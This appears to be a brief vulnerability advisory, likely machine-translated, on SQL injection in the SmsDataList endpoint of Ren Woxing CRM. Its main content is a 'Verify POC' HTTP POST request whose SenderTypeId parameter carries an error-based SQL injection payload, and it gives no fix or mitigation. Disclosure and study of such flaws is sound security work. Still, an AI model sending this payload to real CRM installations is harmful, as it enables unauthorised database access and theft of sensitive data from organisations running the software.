Renwoxing Crm Smsdatalist Sql Injection Vulnerability
Renwoxing Crm Smsdatalist Sql Injection Vulnerability
Ren Woxing CRM SmsDataList SQL injection vulnerability
Vulnerability Description
The CRM SmsDataList interface has a SQL injection vulnerability. An attacker can execute any database statement to obtain sensitive information through the vulnerability.
Vulnerability Impact
Ren Woxing CRM
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host:
Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000' and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI
This post is licensed under CC BY 4.0 by the author.